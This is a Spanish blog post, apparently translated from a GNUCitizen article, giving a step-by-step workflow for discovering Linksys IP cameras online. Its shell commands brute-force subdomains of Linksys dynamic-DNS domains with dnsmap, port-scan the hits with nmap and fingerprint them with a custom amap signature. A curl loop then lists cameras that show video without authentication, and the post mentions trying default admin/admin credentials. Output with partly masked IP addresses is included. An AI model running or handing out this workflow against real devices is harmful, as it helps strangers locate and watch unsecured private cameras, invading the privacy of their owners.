miércoles, 30 de marzo de 2011

Hacking Linksys IP Camaras

Saludos Mundo Libre

Como sabemos, hay varias maneras se podría ir sobre la caza de cámaras IP en la red. La manera más lenta sería portscan direcciones IP aleatorias en los puertos determinados y programación detectar si la interfaz web de una cámara que se dio fue disponibles en los puertos abiertos encontrados. Este método definitivamente las obras, pero puede tomar mucho tiempo ya que se trata de escanear direcciones IP al azar con la esperanza de que finalmente va a venir a través del tipo de dispositivo que está interesado pulg

El segundo método, que sería mucho más rápido en la búsqueda de nuestros dispositivos de destino, sería utilizar un motor de búsqueda y el contenido de la consulta que es exclusivo de nuestros dispositivos de destino (por ejemplo: las direcciones URL, el título de HTML). Este método, popularizado por GHDB es simple y eficaz. El único problema que encuentro en esta estrategia es que muchas de estas cámaras IP que se encuentran suceder a responder muy lentamente. Esto se debe probablemente a otras personas curiosas ejecutando las mismas búsquedas y acceder a las mismas cámaras.

El tercer método que permita buscar más "ocultas" Linksys cámaras IP (es decir: no en caché por motores de búsqueda también conocido como la web oculta), consistiría en fuerza bruta subdominios en los nombres de dominio dinámico (DDNS) utilizado por los dispositivos de nuestro objetivo (IP de Linksys cámaras en este caso). Por ejemplo, los siguientes son algunos de los nombres de dominio dinámico con el apoyo de la WVC54GCA y WVC80N Linksys modelos de cámaras IP:

linksys-cam.com
mylinksyscamera.com
mylinksyshome.com
mylinksyscam.com
mylinksysview.com
linksysremotecam.com
linksysremoteview.com
linksyshomemonitor.com


Cámara proceso de descubrimiento a través de fuerza bruta subdominio

En primer lugar, guarde los dominios antes mencionados en un archivo, en este caso. Luego usamos dnsmap de fuerza bruta subdominios para cada uno de los ámbitos incluidos

Uso de Dnsmap integrado de lista de palabras:

$ for i in `cat doms`;do dnsmap $i -r ~/ -i 64.14.13.199,216.39.81.84&done;

Uso de una lista de palabras por el usuario, wordlist_TLAs.txt en este caso, que es una lista de palabras acrónimo de tres letras se incluye con dnsmap v0.30:

$ for i in `cat doms`;do dnsmap $i -w wordlist_TLAs.txt -r ~/ -i 64.14.13.199,216.39.81.84&done:

Nota: dnsmap de '-i' opción permite ignorar las direcciones IP suministradas por el usuario de los resultados. En este caso, 64.14.13.199 y 216.39.81.84 pertenecen al proveedor de servicios DDNS, y por lo tanto se consideraría como falsos positivos en este caso (sólo estamos interesados ​​en la configuración de cámaras IP de sus respectivos dueños, después de todo). Para obtener más información sobre cómo utilizar dnsmap, pago y envío del archivo README.

A continuación, analizar las direcciones IP de los subdominios descubierto por dnsmap:

$ grep \# dnsmap*.txt | awk '{print $4}' | sort | uniq > ips.txt

A continuación, escaneo de puertos que podrían ser utilizados por un servidor IP de Linksys cámara web. En este caso, elegimos los puertos TCP 80, 1024 y 1025 como candidatos:

$ sudo nmap -v -T4 -n -P0 -sS -p80,1024,1025 -iL ips.txt -oA nmap_http_ports.`date +%Y-%m-%d-%H%M%S`

Esto nos deja con una gran cantidad de servicios descubiertos, pero no absolutamente todavía saber cuál de ellas corresponden a reales Linksys interfaces web, cámaras IP. Hay muchas maneras de fingreprint el servidor web de una cámara IP de Linksys. En este caso se optó por crear nuestra propia firma respuesta AMAP, y luego escanear los puertos abiertos con AMAP.

Antes de AMAP es capaz de identificar nuestro objetivo cámaras IP de Linksys, la firma siguiente respuesta tiene que ser añadido a appdefs.resp y AMAP luego tiene que ser recompilados. De lo contrario amap no tendrá la nueva firma en cuenta:

http-Linksys-cam:: TCP:: ^ HTTP / .* \ nservidor: thttpd / .* Accept-Ranges: bytes .* WVC

Tenga en cuenta que la firma amap respuesta anterior fue probado sólo en contra de la WVC54GCA y WVC80N Linksys modelos de cámaras IP. Así que no estoy seguro si va a trabajar en contra de otros modelos. Usted ha sido advertido!

Una vez recompilado, AMAP puede ser utilizado para identificar las cámaras IP de Linksys resultados abren nmap los puertos

$amap -i nmap_http_ports.2010-02-22-102001.gnmap -R -S -o amap_results.`date +%Y-%m-%d-%H%M%S`

Finalmente, analizar las direcciones IP y puertos abiertos para todos los descubrió la cámara IP de Linksys

$ grep http-linksys-cam amap_results.2010-02-22-102253 | awk '{print $3}' | cut -d \/ -f1
x.x.167.245:1024
x.x.228.231:1025
x.x.228.231:80
x.x.64.22:80
x.x.206.70:1024
x.x.31.4:1024
x.x.164.28:1024
[snip]

En este punto hemos logrado la tarea de crear una lista de Linksys cámaras IP sin tener que recurrir a motores de búsqueda o exploración direcciones IP aleatorias. Para descubrir más cámaras de Linksys, una lista de palabras más completo tendría que ser utilizado con dnsmap.

Por supuesto, la automatización más allá sería posible. Por ejemplo, un atacante podría determinar mediante programación qué cámaras de Linksys en la lista anterior que permite la visualización de vídeo a los usuarios no autenticados

$ amapfile=amap_results.2010-02-22-102253;for i in `grep http-linksys-cam $amapfile | awk '{print $3}' | cut -d \/ -f1`;do url="http://$i/img/main.cgi?next_file=main.htm";if curl --connect-timeout 2 -s -I --url $url | grep ^"HTTP/1.1 501">/dev/null;then echo $url;fi;done;
x.x.206.70:1024/img/main.cgi?next_file=main.htm
x.x.105.221:1024/img/main.cgi?next_file=main.htm
x.x.105.221:80/img/main.cgi?next_file=main.htm
x.x.181.195:1024/img/main.cgi?next_file=main.htm
x.x.243.154:1024/img/main.cgi?next_file=main.htm
x.x.243.154:1025/img/main.cgi?next_file=main.htm
x.x.30.196:1025/img/main.cgi?next_file=main.htm
[snip]

Además de comprobar automáticamente para la visualización de vídeo anónimo en todas las cámaras que se encuentran, otras tareas como la comprobación de las credenciales por defecto (admin / admin) también podría ser el guión, aunque esto no se incluirán en este post (o cualquier otro en GnuCitizen)

Fuente: http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-6/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+gnucitizen+%28GNUCITIZEN%29

Traduccion Dellcom1a.

Saludos Mundo libre.

No hay comentarios:

Publicar un comentario